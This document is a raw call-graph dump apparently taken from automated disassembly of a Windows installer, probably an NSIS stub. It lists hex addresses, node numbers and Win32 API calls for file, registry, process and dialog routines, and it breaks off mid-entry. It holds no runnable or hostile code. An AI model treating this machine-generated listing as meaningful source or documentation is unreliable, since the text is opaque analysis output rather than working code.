RemoveDirectoryA 3199->3201 3200->3197 3205 405768 FindNextFileA 3200->3205 3210 40572f 3200->3210 3216 405620 61 API calls 3200->3216 3240 405cfb lstrcpynA 3200->3240 3202 4057e0 3201->3202 3203 4057c9 3201->3203 3204 404fe7 25 API calls 3202->3204 3203->3184 3207 4057cf 3203->3207 3204->3184 3205->3200 3208 405780 FindClose 3205->3208 3209 404fe7 25 API calls 3207->3209 3208->3195 3211 4057d7 3209->3211 3213 4059b3 2 API calls 3210->3213 3212 405a49 40 API calls 3211->3212 3214 4057de 3212->3214 3215 405735 DeleteFileA 3213->3215 3214->3184 3220 405740 3215->3220 3216->3200 3217 404fe7 25 API calls 3217->3205 3218 404fe7 25 API calls 3218->3220 3220->3205 3220->3217 3220->3218 3241 405a49 3220->3241 3267 405cfb lstrcpynA 3221->3267 3223 4058e0 3224 405882 4 API calls 3223->3224 3225 4058e6 3224->3225 3226 405634 3225->3226 3227 405f5d 5 API calls 3225->3227 3226->3182 3226->3183 3233 4058f6 3227->3233 3228 405921 lstrlenA 3229 40592c 3228->3229 3228->3233 3230 4057ee 3 API calls 3229->3230 3232 405931 GetFileAttributesA 3230->3232 3231 405ff6 2 API calls 3231->3233 3232->3226 3233->3226 3233->3228 3233->3231 3234 405835 2 API calls 3233->3234 3234->3228 3235->3186 3237 405842 3236->3237 3238 405853 3237->3238 3239 405847 CharPrevA 3237->3239 3238->3190 3239->3237 3239->3238 3240->3200 3268 406087 GetModuleHandleA 3241->3268 3244 405ab1 GetShortPathNameA 3246 405ac6 3244->3246 3247 405ba6 3244->3247 3246->3247 3249 405ace wsprintfA 3246->3249 3247->3220 3248 405a95 CloseHandle GetShortPathNameA 3248->3247 3250 405aa9 3248->3250 3251 405d1d 18 API calls 3249->3251 3250->3244 3250->3247 3252 405af6 3251->3252 3275 4059d2 GetFileAttributesA CreateFileA 3252->3275 3254 405b03 3254->3247 3255 405b12 GetFileSize GlobalAlloc 3254->3255 3256 405b30 ReadFile 3255->3256 3257 405b9f CloseHandle 3255->3257 3256->3257 3258 405b44 3256->3258 3257->3247 3258->3257 3276 405947 lstrlenA 3258->3276 3261 405bb3 3263 405947 4 API calls 3261->3263 3262 405b59 3281 405cfb lstrcpynA 3262->3281 3265 405b67 3263->3265 3266 405b7a SetFilePointer WriteFile GlobalFree 3265->3266 3266->3257 3267->3223 3269 4060a3 3268->3269 3270 4060ad GetProcAddress 3268->3270 3282 40601d GetSystemDirectoryA 3269->3282 3273 405a54 3270->3273 3272 4060a9 3272->3270 3272->3273 3273->3244 3273->3247 3274 4059d2 GetFileAttributesA CreateFileA 3273->3274 3274->3248 3275->3254 3277 40597d lstrlenA 3276->3277 3278 40595b lstrcmpiA 3277->3278 3280 405987 3277->3280 3279 405974 CharNextA 3278->3279 3278->3280 3279->3277 3280->3261 3280->3262 3281->3265 3283 40603f wsprintfA LoadLibraryA 3282->3283 3283->3272 3670 4025e2 3671 4025e9 3670->3671 3673 40284e 3670->3673 3672 4029ef 18 API calls 3671->3672 3674 4025f4 3672->3674 3675 4025fb SetFilePointer 3674->3675 3675->3673 3676 40260b 3675->3676 3678 405c59 wsprintfA 3676->3678 3678->3673 3679 403ae4 3680 403c37 3679->3680 3681 403afc 3679->3681 3682 403c88 3680->3682 3683 403c48 GetDlgItem GetDlgItem 3680->3683 3681->3680 3684 403b08 3681->3684 3688 403ce2 3682->3688 3696 401389 2 API calls 3682->3696 3764 403fb7 3683->3764 3685 403b13 SetWindowPos 3684->3685 3686 403b26 3684->3686 3685->3686 3689 403b43 3686->3689 3690 403b2b ShowWindow 3686->3690 3692 404003 SendMessageA 3688->3692 3738 403c32 3688->3738 3693 403b65 3689->3693 3694 403b4b DestroyWindow 3689->3694 3690->3689 3691 403c72 SetClassLongA 3695 40140b 2 API calls 3691->3695 3736 403cf4 3692->3736 3697 403b6a SetWindowLongA 3693->3697 3698 403b7b 3693->3698 3746 403f40 3694->3746 3695->3682 3699 403cba 3696->3699 3697->3738 3702 403b87 GetDlgItem 3698->3702 3715 403bf2 3698->3715 3699->3688 3703 403cbe SendMessageA 3699->3703 3700 40140b 2 API calls 3700->3736 3701 403f42 DestroyWindow EndDialog 3701->3746 3705 403b9a SendMessageA IsWindowEnabled 3702->3705 3708 403bb7 3702->3708 3703->3738 3704 403f71 ShowWindow 3704->3738 3705->3708 3705->3738 3707 405d1d 18 API calls 3707->3736 3709 403bc4 3708->3709 3710 403bd7 3708->3710 3711 403c0b SendMessageA 3708->3711 3719 403bbc 3708->3719 3709->3711 3709->3719 3713 403bf4 3710->3713 3714 403bdf 3710->3714 3711->3715 3717 40140b 2 API calls 3713->3717 3716 40140b 2 API calls 3714->3716 3750 40401e 3715->3750 3716->3719 3717->3719 3718 403fb7 19 API calls 3718->3736 3719->3715 3747 403f90 3719->3747 3720 403fb7 19 API calls 3721 403d6f GetDlgItem 3720->3721 3722 403d84 3721->3722 3723 403d8c ShowWindow EnableWindow 3721->3723 3722->3723 3767 403fd9 EnableWindow 3723->3767 3725 403db6 EnableWindow 3728 403dca 3725->3728 3726 403dcf GetSystemMenu EnableMenuItem SendMessageA 3727 403dff SendMessageA 3726->3727 3726->3728 3727->3728 3728->3726 3768 403fec SendMessageA 3728->3768 3769 405cfb lstrcpynA 3728->3769 3731 403e2d lstrlenA 3732 405d1d 18 API calls 3731->3732 3733 403e3e SetWindowTextA 3732->3733 3734 401389 2 API calls 3733->3734 3734->3736 3735 403e82 DestroyWindow 3737 403e9c CreateDialogParamA 3735->3737 3735->3746 3736->3700 3736->3701 3736->3707 3736->3718 3736->3720 3736->3735 3736->3738 3739 403ecf 3737->3739 3737->3746 3740 403fb7 19 API calls 3739->3740 3741 403eda GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3740->3741 3742 401389 2 API calls 3741->3742 3743 403f20 3742->3743 3743->3738 3744 403f28 ShowWindow 3743->3744 3745 404003 SendMessageA 3744->3745 3745->3746 3746->3704 3746->3738 3748 403f97 3747->3748 3749 403f9d SendMessageA 3747->3749 3748->3749 3749->3715 3751 4040bf 3750->3751 3752 404036 GetWindowLongA 3750->3752 3751->3738 3752->3751 3753 404047 3752->3753 3754 404056 GetSysColor 3753->3754 3755 404059 3753->3755 3754->3755 3756 404069 SetBkMode 3755->3756 3757 40405f SetTextColor 3755->3757 3758 404081 GetSysColor 3756->3758 3759 404087 3756->3759 3757->3756 3758->3759 3760 404098 3759->3760 3761 40408e SetBkColor 3759->3761 3760->3751 3762 4040b2 CreateBrushIndirect 3760->3762 3763 4040ab DeleteObject 3760->3763 3761->3760 3762->3751 3763->3762 3765 405d1d 18 API calls 3764->3765 3766 403fc2 SetDlgItemTextA 3765->3766 3766->3691 3767->3725 3768->3728 3769->3731 3770 401ae5 3771 402a0c 18 API calls 3770->3771 3772 401aec 3771->3772 3773 4029ef 18 API calls 3772->3773 3774 401af5 wsprintfA 3773->3774 3775 4028a1 3774->3775 3776 4019e6 3777 402a0c 18 API calls 3776->3777 3778 4019ef ExpandEnvironmentStringsA 3777->3778 3779 401a03 3778->3779 3781 401a16 3778->3781 3780 401a08 lstrcmpA 3779->3780 3779->3781 3780->3781 3782 401f67 3783 401f79 3782->3783 3792 402028 3782->3792 3784 402a0c 18 API calls 3783->3784 3785 401f80 3784->3785 3787 402a0c 18 API calls 3785->3787 3786 401423 25 API calls 3793 40217f 3786->3793 3788 401f89 3787->3788 3789 401f91 GetModuleHandleA 3788->3789 3790 401f9e LoadLibraryExA 3788->3790 3789->3790 3791 401fae GetProcAddress 3789->3791 3790->3791 3790->3792 3794 401ffb 3791->3794 3795 401fbe 3791->3795 3792->3786 3796 404fe7 25 API calls 3794->3796 3797 401423 25 API calls 3795->3797 3798 401fce 3795->3798 3796->3798 3797->3798 3798->3793 3799 40201c FreeLibrary 3798->3799 3799->3793 3814 401c6d 3815 4029ef 18 API calls 3814->3815 3816 401c73 IsWindow 3815->3816 3817 4019d6 3816->3817 3818 4014f0 SetForegroundWindow 3819 4028a1 3818->3819 3827 4043f5 3828 404421 3827->3828 3829 404432 3827->3829 3888 4055a0 GetDlgItemTextA 3828->3888 3830 40443e GetDlgItem 3829->3830 3837 40449d 3829->3837 3832 404452 3830->3832 3836 404466 SetWindowTextA 3832->3836 3840 405882 4 API calls 3832->3840 3833 404581 3886 40472b 3833->3886 3890 4055a0 GetDlgItemTextA 3833->3890 3834 40442c 3835 405f5d 5 API calls 3834->3835 3835->3829 3841 403fb7 19 API calls 3836->3841 3837->3833 3842 405d1d 18 API calls 3837->3842 3837->3886 3839 40401e 8 API calls 3844 40473f 3839->3844 3845 40445c 3840->3845 3846 404482 3841->3846 3847 404511 SHBrowseForFolderA 3842->3847 3843 4045b1 3848 4058cf 18 API calls 3843->3848 3845->3836 3852 4057ee 3 API calls 3845->3852 3849 403fb7 19 API calls 3846->3849 3847->3833 3850 404529 CoTaskMemFree 3847->3850 3851 4045b7 3848->3851 3853 404490 3849->3853 3854 4057ee 3 API calls 3850->3854 3891 405cfb lstrcpynA 3851->3891 3852->3836 3889 403fec SendMessageA 3853->3889 3857 404536 3854->3857 3859 40456d SetDlgItemTextA 3857->3859 3863 405d1d 18 API calls 3857->3863 3858 404496 3861 406087 5 API calls 3858->3861 3859->3833 3860 4045ce 3862 406087 5 API calls 3860->3862 3861->3837 3864 4045d5 3862->3864 3865 404555 lstrcmpiA 3863->3865 3866 404611 3864->3866 3874 405835 2 API calls 3864->3874 3875 404669 3864->3875 3865->3859 3867 404566 lstrcatA 3865->3867 3892 405cfb lstrcpynA 3866->3892 3867->3859 3869 404618 3870 405882 4 API calls 3869->3870 3871 40461e GetDiskFreeSpaceA 3870->3871 3873 404642 MulDiv 3871->3873 3871->3875 3873->3875 3874->3864 3876 4046da 3875->3876 3893 404871 3875->3893 3878 4046fd 3876->3878 3880 40140b 2 API calls 3876->3880 3904 403fd9 EnableWindow 3878->3904 3880->3878 3881 4046dc SetDlgItemTextA 3881->3876 3882 4046cc 3896 4047ac 3882->3896 3885 404719 3885->3886 3905 40438a 3885->3905 3886->3839 3888->3834 3889->3858 3890->3843 3891->3860 3892->3869 3894 4047ac 21 API calls 3893->3894 3895 4046c7 3894->3895 3895->3881 3895->3882 3897 4047c2 3896->3897 3898 405d1d 18 API calls 3897->3898 3899 404826 3898->3899 3900 405d1d 18 API calls 3899->3900 3901 404831 3900->3901 3902 405d1d 18 API calls 3901->3902 3903 404847 lstrlenA wsprintfA SetDlgItemTextA 3902->3903 3903->3876 3904->3885 3906 404398 3905->3906 3907 40439d SendMessageA 3905->3907 3906->3907 3907->3886 3908 4016fa 3909 402a0c 18 API calls 3908->3909 3910 401701 SearchPathA 3909->3910 3911 40171c 3910->3911 3913 4027cc 3910->3913 3911->3913 3914 405cfb lstrcpynA 3911->3914 3914->3913 3915 40287c SendMessageA 3916 4028a1 3915->3916 3917 402896 InvalidateRect 3915->3917 3917->3916 3918 40227d 3919 402a0c 18 API calls 3918->3919 3920 40228b 3919->3920 3921 402a0c 18 API calls 3920->3921 3922 402294 3921->3922 3923 402a0c 18 API calls 3922->3923 3924 40229e GetPrivateProfileStringA 3923->3924 3925 4014fe 3926 401506 3925->3926 3928 401519 3925->3928 3927 4029ef 18 API calls 3926->3927 3927->3928 3936 4040ff 3937 404115 3936->3937 3942 404222 3936->3942 3939 403fb7 19 API calls 3937->3939 3938 404291 3940 404365 3938->3940 3941 40429b GetDlgItem 3938->3941 3943 40416b 3939->3943 3946 40401e 8 API calls 3940->3946 3947 4042b1 3941->3947 3948 404323 3941->3948 3942->3938 3942->3940 3944 404266 GetDlgItem SendMessageA 3942->3944 3945 403fb7 19 API calls 3943->3945 3967 403fd9 EnableWindow 3944->3967 3950 404178 CheckDlgButton 3945->3950 3951 404360 3946->3951 3947->3948 3952 4042d7 6 API calls 3947->3952 3948->3940 3953 404335 3948->3953 3965 403fd9 EnableWindow 3950->3965 3952->3948 3956 40433b SendMessageA 3953->3956 3957 40434c 3953->3957 3954 40428c 3958 40438a SendMessageA 3954->3958 3956->3957 3957->3951 3960 404352 SendMessageA 3957->3960 3958->3938 3959 404196 GetDlgItem 3966 403fec SendMessageA 3959->3966 3960->3951 3962 4041ac SendMessageA 3963 4041d3 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 3962->3963 3964 4041ca GetSysColor 3962->3964 3963->3951 3964->3963 3965->3959 3966->3962 3967->3954 3968 401000 3969 401037 BeginPaint GetClientRect 3968->3969 3971 40100c DefWindowProcA 3968->3971 3972 4010f3 3969->3972 3973 401179 3971->3973 3974 401073 CreateBrushIndirect FillRect DeleteObject 3972->3974 3975 4010fc 3972->3975 3974->3972 3976 401102 CreateFontIndirectA 3975->3976 3977 401167 EndPaint 3975->3977 3976->3977 3978 401112 6 API calls 3976->3978 3977->3973 3978->3977 3979 402188 3980 402a0c 18 API calls 3979->3980 3981 40218e 3980->3981 3982 402a0c 18 API calls 3981->3982 3983 402197 3982->3983 3984 402a0c 18 API calls 3983->3984 3985 4021a0 3984->3985 3986 405ff6 2 API calls 3985->3986 3987 4021a9 3986->3987 3988 4021ba lstrlenA lstrlenA 3987->3988 3989 4021ad 3987->3989 3991 404fe7 25 API calls 3988->3991 3990 404fe7 25 API calls 3989->3990 3993 4021b5 3989->3993 3990->3993 3992 4021f6 SHFileOperationA 3991->3992 3992->3989 3992->3993 3142 401389 3144 401390 3142->3144 3143 4013fe 3144->3143 3145 4013cb MulDiv SendMessageA 3144->3145 3145->3144 3994 40220a 3995 402211 3994->3995 3998 402224 3994->3998 3996 405d1d 18 API calls 3995->3996 3997 40221e 3996->3997 3999 4055bc MessageBoxIndirectA 3997->3999 3999->3998 4000 401c8a 4001 4029ef 18 API calls 4000->4001 4002 401c91 4001->4002 4003 4029ef 18 API calls 4002->4003 4004 401c99 GetDlgItem 4003->4004 4005 4024ce 4004->4005 4006 40370c 4007 403717 4006->4007 4008 40371e GlobalAlloc 4007->4008 4009 40371b 4007->4009 4008->4009 4010 401490 4011 404fe7 25 API calls 4010->4011 4012 401497 4011->4012 4013 402611 4014 402618 4013->4014 4016 4028a1 4013->4016 4015 40261e FindClose 4014->4015 4015->4016 4017 402692 4018 402a0c 18 API calls 4017->4018 4020 4026a0 4018->4020 4019 4026b6 4022 4059b3 2 API calls 4019->4022 4020->4019 4021 402a0c 18 API calls 4020->4021 4021->4019 4023 4026bc 4022->4023 4043 4059d2 GetFileAttributesA CreateFileA 4023->4043 4025 4026c9 4026 402772 4025->4026 4027 4026d5 GlobalAlloc 4025->4027 4030 40277a DeleteFileA 4026->4030 4031 40278d 4026->4031 4028 402769 CloseHandle 4027->4028 4029 4026ee 4027->4029 4028->4026 4044 403207 SetFilePointer 4029->4044 4030->4031 4033 4026f4 4034 4031d5 ReadFile 4033->4034 4035 4026fd GlobalAlloc 4034->4035 4036 402741 WriteFile GlobalFree 4035->4036 4037 40270d 4035->4037 4039 402f2e 48 API calls 4036->4039 4038 402f2e 48 API calls 4037->4038 4042 40271a 4038->4042 4040 402766 4039->4040 4040->4028 4041 402738 GlobalFree 4041->4036 4042->4041 4043->4025 4044->4033 4045 401595 4046 402a0c 18 API calls 4045->4046 4047 40159c SetFileAttributesA 4046->4047 4048 4015ae 4047->4048 4049 401e95 4050 402a0c 18 API calls 4049->4050 4051 401e9c 4050->4051 4052 405ff6 2 API calls 4051->4052 4053 401ea2 4052->4053 4055 401eb4 4053->4055 4056 405c59 wsprintfA 4053->4056 4056->4055 4057 401696 4058 402a0c 18 API calls 4057->4058 4059 40169c GetFullPathNameA 4058->4059 4060 4016b3 4059->4060 4066 4016d4 4059->4066 4063 405ff6 2 API calls 4060->4063 4060->4066 4061 4028a1 4062 4016e8 GetShortPathNameA 4062->4061 4064 4016c4 4063->4064 4064->4066 4067 405cfb lstrcpynA 4064->4067 4066->4061 4066->4062 4067->4066 4075 402319 4076 40231f 4075->4076 4077 402a0c 18 API calls 4076->4077 4078 402331 4077->4078 4079 402a0c 18 API calls 4078->4079 4080 40233b RegCreateKeyExA 4079->4080 4081 4028a1 4080->4081 4082 402365 4080->4082 4083 40237d 4082->4083 4084 402a0c 18 API calls 4082->4084 4085 402389 4083->4085 4087 4029ef 18 API calls 4083->4087 4086 402376 lstrlenA 4084->4086 4088 4023a4 RegSetValueExA 4085->4088 4089 402f2e 48 API calls 4085->4089 4086->4083 4087->4085 4090 4023ba RegCloseKey 4088->4090 4089->4088 4090->4081 4092 402819 4093 4029ef 18 API calls 4092->4093 4094 40281f 4093->4094 4095 402672 4094->4095 4096 402850 4094->4096 4097 40282d 4094->4097 4096->4095 4098 405d1d 18 API calls 4096->4098 4097->4095 4100 405c59 wsprintfA 4097->4100 4098->4095 4100->4095 3146 401e1b 3147 402a0c 18 API calls 3146->3147 3148 401e21 3147->3148 3149 404fe7 25 API calls 3148->3149 3150 401e2b 3149->3150 3162 40555b CreateProcessA 3150->3162 3152 402672 3153 401e87 CloseHandle 3153->3152 3154 401e50 WaitForSingleObject 3155 401e31 3154->3155 3156 401e5e GetExitCodeProcess 3154->3156 3155->3152 3155->3153 3155->3154 3159 4060c3 2 API calls 3155->3159 3157 401e70 3156->3157 3158 401e7b 3156->3158 3165 405c59 wsprintfA 3157->3165 3158->3153 3161 401e79 3158->3161 3159->3154 3161->3153 3163 405596 3162->3163 3164 40558a CloseHandle 3162->3164 3163->3155 3164->3163 3165->3161 4101 401d1b GetDC GetDeviceCaps 4102 4029ef 18 API calls 4101->4102 4103 401d37 MulDiv 4102->4103 4104 4029ef 18 API calls 4103->4104 4105 401d4c 4104->4105 4106 405d1d 18 API calls 4105->4106 4107 401d85 CreateFontIndirectA 4106->4107 4108 4024ce 4107->4108 4108->4108 4109 40251c 4110 4029ef 18 API calls 4109->4110 4111 402526 4110->4111 4112 40255a ReadFile 4111->4112 4113 40259e 4111->4113 4115 4025ae 4111->4115 4117 40259c 4111->4117 4112->4111 4112->4117 4118 405c59 wsprintfA 4113->4118 4116 4025c4 SetFilePointer 4115->4116 4115->4117 4116->4117 4118->4117 2933 401721 2939 402a0c 2933->2939 2937 40172f 2938 405a01 2 API calls 2937->2938 2938->2937 2940 402a18 2939->2940 2949 405d1d 2940->2949 2943 401728 2945 405a01 2943->2945 2946 405a0c GetTickCount GetTempFileNameA 2945->2946 2947 405a3c 2946->2947 2948 405a38 2946->2948 2947->2937 2948->2946 2948->2947 2959 405d2a 2949->2959 2950 405f44 2951 402a39 2950->2951 2984 405cfb lstrcpynA 2950->2984 2951->2943 2968 405f5d 2951->2968 2953 405dc2 GetVersion 2954 405dcf 2953->2954 2954->2959 2961 405e3a GetSystemDirectoryA 2954->2961 2962 405e4d GetWindowsDirectoryA 2954->2962 2964 405d1d 10 API calls 2954->2964 2965 405ec4 lstrcatA 2954->2965 2966 405e81 SHGetSpecialFolderLocation 2954->2966 2977 405be2 RegOpenKeyExA 2954->2977 2955 405f1b lstrlenA 2955->2959 2958 405d1d 10 API calls 2958->2955 2959->2950 2959->2953 2959->2955 2959->2958 2963 405f5d 5 API calls 2959->2963 2982 405c59 wsprintfA 2959->2982 2983 405cfb lstrcpynA 2959->2983 2961->2954 2962->2954 2963->2959 2964->2954 2965->2959 2966->2954 2967 405e99 SHGetPathFromIDListA CoTaskMemFree 2966->2967 2967->2954 2974 405f69 2968->2974 2969 405fd1 2970 405fd5 CharPrevA 2969->2970 2973 405ff0 2969->2973 2970->2969 2971 405fc6 CharNextA 2971->2969 2971->2974 2973->2943 2974->2969 2974->2971 2975 405fb4 CharNextA 2974->2975 2976 405fc1 CharNextA 2974->2976 2985 405819 2974->2985 2975->2974 2976->2971 2978 405c53 2977->2978 2979 405c15 RegQueryValueExA 2977->2979 2978->2954 2980 405c36 RegCloseKey 2979->2980 2980->2978 2982->2959 2983->2959 2984->2951 2986 40581f 2985->2986 2987 405832 2986->2987 2988 405825 CharNextA 2986->2988 2987->2974 2988->2986 4119 401922 4120 402a0c 18 API calls 4119->4120 4121 401929 lstrlenA 4120->4121 4122 4024ce 4121->4122 4123 405125 4124 4052d1 4123->4124 4125 405146 GetDlgItem GetDlgItem GetDlgItem 4123->4125 4127 405302 4124->4127 4128 4052da GetDlgItem CreateThread CloseHandle 4124->4128 4169 403fec SendMessageA 4125->4169 4130 40532d 4127->4130 4131 405319 ShowWindow ShowWindow 4127->4131 4132 40534f 4127->4132 4128->4127 4129 4051b7 4135 4051be GetClientRect GetSystemMetrics SendMessageA SendMessageA 4129->4135 4133 40538b 4130->4133 4137 405364 ShowWindow 4130->4137 4138 40533e 4130->4138 4171 403fec SendMessageA 4131->4171 4134 40401e 8 API calls 4132->4134 4133->4132 4143 405396 SendMessageA 4133->4143 4149 40535d 4134->4149 4141 405211 SendMessageA SendMessageA 4135->4141 4142 40522d 4135->4142 4139 405384 4137->4139 4140 405376 4137->4140 4144 403f90 SendMessageA 4138->4144 4146 403f90 SendMessageA 4139->4146 4145 404fe7 25 API calls 4140->4145 4141->4142 4147 405240 4142->4147 4148 405232 SendMessageA 4142->4148 4143->4149 4150 4053af CreatePopupMenu 4143->4150 4144->4132 4145->4139 4146->4133 4152 403fb7 19 API calls 4147->4152 4148->4147 4151 405d1d 18 API calls 4150->4151 4153 4053bf AppendMenuA 4151->4153 4154 405250 4152->4154 4155 4053d2 GetWindowRect 4153->4155 4156 4053e5 4153->4156 4157 405259 ShowWindow 4154->4157 4158 40528d GetDlgItem SendMessageA 4154->4158 4159 4053ee TrackPopupMenu 4155->4159 4156->4159 4160 40527c 4157->4160 4161 40526f ShowWindow 4157->4161 4158->4149 4162 4052b4 SendMessageA SendMessageA 4158->4162 4159->4149 4163 40540c 4159->4163 4170 403fec SendMessageA 4160->4170 4161->4160 4162->4149 4164 405428 SendMessageA 4163->4164 4164->4164 4166 405445 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4164->4166 4167 405467 SendMessageA 4166->4167 4167->4167 4168 405488 GlobalUnlock SetClipboardData CloseClipboard 4167->4168 4168->4149 4169->4129 4170->4158 4171->4130 4172 401ca5 4173 4029ef 18 API calls 4172->4173 4174 401cb5 SetWindowLongA 4173->4174 4175 4028a1 4174->4175 4176 401a26 4177 4029ef 18 API calls 4176->4177 4178 401a2c 4177->4178 4179 4029ef 18 API calls 4178->4179 4180 4019d6 4179->4180 4181 406a26 4184 4061b7 4181->4184 4182 406241 GlobalAlloc 4182->4184 4185 406b22 4182->4185 4183 406238 GlobalFree 4183->4182 4184->4182 4184->4183 4184->4184 4184->4185 4186 4062b8 GlobalAlloc 4184->4186 4187 4062af GlobalFree 4184->4187 4186->4184 4186->4185 4187->4186 4188 40262b 4189 402646 4188->4189 4190 40262e 4188->4190 4191 4027cc 4189->4191 4194 405cfb lstrcpynA 4189->4194 4192 40263b FindNextFileA 4190->4192 4192->4189 4194->4191 4195 401bad 4196 4029ef 18 API calls 4195->4196 4197 401bb4 4196->4197 4198 4029ef 18 API calls 4197->4198 4199 401bbe 4198->4199 4200 401bce 4199->4200 4201 402a0c 18 API calls 4199->4201 4202 401bde 4200->4202 4203 402a0c 18 API calls 4200->4203 4201->4200 4204 401be9 4202->4204 4205 401c2d 4202->4205 4203->4202 4207 4029ef 18 API calls 4204->4207 4206 402a0c 18 API calls 4205->4206 4209 401c32 4206->4209 4208 401bee 4207->4208 4210 4029ef 18 API calls 4208->4210 4211 402a0c 18 API calls 4209->4211 4212 401bf7 4210->4212 4213 401c3b FindWindowExA 4211->4213 4214 401c1d SendMessageA 4212->4214 4215 401bff SendMessageTimeoutA 4212->4215 4216 401c59 4213->4216 4214->4216 4215->4216 4217 4043ae 4218 4043e4 4217->4218 4219 4043be 4217->4219 4221 40401e 8 API calls 4218->4221 4220 403fb7 19 API calls 4219->4220 4222 4043cb SetDlgItemTextA 4220->4222 4223 4043f0 4221->4223 4222->4218 4224 4024b2 4225 402a0c 18 API calls 4224->4225 4226 4024b9 4225->4226 4229 4059d2 GetFileAttributesA CreateFileA 4226->4229 4228 4024c5 4229->4228 2989 4015b3 2990 402a0c 18 API calls 2989->2990 2991 4015ba 2990->2991 3007 405882 CharNextA CharNextA 2991->3007 2993 4015c2 2994 40160a 2993->2994 2995 405819 CharNextA 2993->2995 2996 40162d 2994->2996 2997 40160f 2994->2997 2998 4015d0 CreateDirectoryA 2995->2998 3001 401423 25 API calls 2996->3001 3013 401423 2997->3013 2998->2993 3000 4015e5 GetLastError 2998->3000 3000->2993 3003 4015f2 GetFileAttributesA 3000->3003 3006 40217f 3001->3006 3003->2993 3005 401621 SetCurrentDirectoryA 3005->3006 3008 4058a8 3007->3008 3009 40589c 3007->3009 3011 405819 CharNextA 3008->3011 3012 4058c5 3008->3012 3009->3008 3010 4058a3 CharNextA 3009->3010 3010->3012 3011->3008 3012->2993 3017 404fe7 3013->3017 3016 405cfb lstrcpynA 3016->3005 3018 401431 3017->3018 3019 405002 3017->3019 3018->3016 3020 40501f lstrlenA 3019->3020 3021 405d1d 18 API calls 3019->3021 3022 405048 3020->3022 3023 40502d lstrlenA 3020->3023 3021->3020 3025 40505b 3022->3025 3026 40504e SetWindowTextA 3022->3026 3023->3018 3024 40503f lstrcatA 3023->3024 3024->3022 3025->3018 3027 405061 SendMessageA SendMessageA SendMessageA 3025->3027 3026->3025 3027->3018 4230 406333 4232 4061b7 4230->4232 4231 406b22 4232->4231 4233 406241 GlobalAlloc 4232->4233 4234 406238 GlobalFree 4232->4234 4235 4062b8 GlobalAlloc 4232->4235 4236 4062af GlobalFree 4232->4236 4233->4231 4233->4232 4234->4233 4235->4231 4235->4232 4236->4235 3028 401734 3029 402a0c 18 API calls 3028->3029 3030 40173b 3029->3030 3031 401761 3030->3031 3032 401759 3030->3032 3083 405cfb lstrcpynA 3031->3083 3082 405cfb lstrcpynA 3032->3082 3035 40175f 3039 405f5d 5 API calls 3035->3039 3036 40176c 3084 4057ee lstrlenA CharPrevA 3036->3084 3058 40177e 3039->3058 3043 401795 CompareFileTime 3043->3058 3044 401859 3045 404fe7 25 API calls 3044->3045 3048 401863 3045->3048 3046 404fe7 25 API calls 3054 401845 3046->3054 3047 405cfb lstrcpynA 3047->3058 3067 402f2e 3048->3067 3051 40188a SetFileTime 3052 40189c FindCloseChangeNotification 3051->3052 3052->3054 3055 4018ad 3052->3055 3053 405d1d 18 API calls 3053->3058 3056 4018b2 3055->3056 3057 4018c5 3055->3057 3059 405d1d 18 API calls 3056->3059 3060 405d1d 18 API calls 3057->3060 3058->3043 3058->3044 3058->3047 3058->3053 3065 401830 3058->3065 3066 4059d2 GetFileAttributesA CreateFileA 3058->3066 3087 405ff6 FindFirstFileA 3058->3087 3090 4059b3 GetFileAttributesA 3058->3090 3093 4055bc 3058->3093 3062 4018ba lstrcatA 3059->3062 3063 4018cd 3060->3063 3062->3063 3064 4055bc MessageBoxIndirectA 3063->3064 3064->3054 3065->3046 3065->3054 3066->3058 3068 402f5b 3067->3068 3069 402f3f SetFilePointer 3067->3069 3097 403059 GetTickCount 3068->3097 3069->3068 3072 402f6c ReadFile 3073 402f8c 3072->3073 3081 401876 3072->3081 3074 403059 43 API calls 3073->3074 3073->3081 3075 402fa3 3074->3075 3076 40301e ReadFile 3075->3076 3079 402fb3 3075->3079 3075->3081 3076->3081 3078 402fce ReadFile 3078->3079 3078->3081 3079->3078 3080 402fe7 WriteFile 3079->3080 3079->3081 3080->3079 3080->3081 3081->3051 3081->3052 3082->3035 3083->3036 3085 401772 lstrcatA 3084->3085 3086 405808 lstrcatA 3084->3086 3085->3035 3086->3085 3088 406017 3087->3088 3089 40600c FindClose 3087->3089 3088->3058 3089->3088 3091 4059c2 SetFileAttributesA 3090->3091 3092 4059cf 3090->3092 3091->3092 3092->3058 3096 4055d1 3093->3096 3094 40561d 3094->3058 3095 4055e5 MessageBoxIndirectA 3095->3094 3096->3094 3096->3095 3098 4031c3 3097->3098 3099 403088 3097->3099 3100 402be9 33 API calls 3098->3100 3110 403207 SetFilePointer 3099->3110 3107 402f64 3100->3107 3102 403093 SetFilePointer 3106 4030b8 3102->3106 3106->3107 3108 40314d WriteFile 3106->3108 3109 4031a4 SetFilePointer 3106->3109 3111 4031d5 ReadFile 3106->3111 3113 406184 3106->3113 3120 402be9 3106->3120 3107->3072 3107->3081 3108->3106 3108->3107 3109->3098 3110->3102 3112 4031f6 3111->3112 3112->3106 3114 4061a9 3113->3114 3115 4061b1 3113->3115 3114->3106 3115->3114 3116 406241 GlobalAlloc 3115->3116 3117 406238 GlobalFree 3115->3117 3118 4062b8 GlobalAlloc 3115->3118 3119 4062af GlobalFree 3115->3119 3116->3114 3116->3115 3117->3116 3118->3114 3118->3115 3119->3118 3121 402bf7 3120->3121 3122 402c0f 3120->3122 3123 402c00 DestroyWindow 3121->3123 3124 402c07 3121->3124 3125 402c17 3122->3125 3126 402c1f GetTickCount 3122->3126 3123->3124 3124->3106 3135 4060c3 3125->3135 3126->3124 3128 402c2d 3126->3128 3129 402c62 CreateDialogParamA ShowWindow 3128->3129 3130 402c35 3128->3130 3129->3124 3130->3124 3139 402bcd 3130->3139 3132 402c43 wsprintfA 3133 404fe7 25 API calls 3132->3133 3134 402c60 3133->3134 3134->3124 3136 4060e0 PeekMessageA 3135->3136 3137 4060f0 3136->3137 3138 4060d6 DispatchMessageA 3136->3138 3137->3124 3138->3136 3140 402bdc 3139->3140 3141 402bde MulDiv 3139->3141 3140->3141 3141->3132 4237 401634 4238 402a0c 18 API calls 4237->4238 4239 40163a 4238->4239 4240 405ff6 2 API calls 4239->4240 4241 401640 4240->4241 4242 401934 4243 4029ef 18 API calls 4242->4243 4244 40193b 4243->4244 4245 4029ef 18 API calls 4244->4245 4246 401945 4245->4246 4247 402a0c 18 API calls 4246->4247 4248 40194e 4247->4248 4249 401961 lstrlenA 4248->4249 4253 40199c 4248->4253 4250 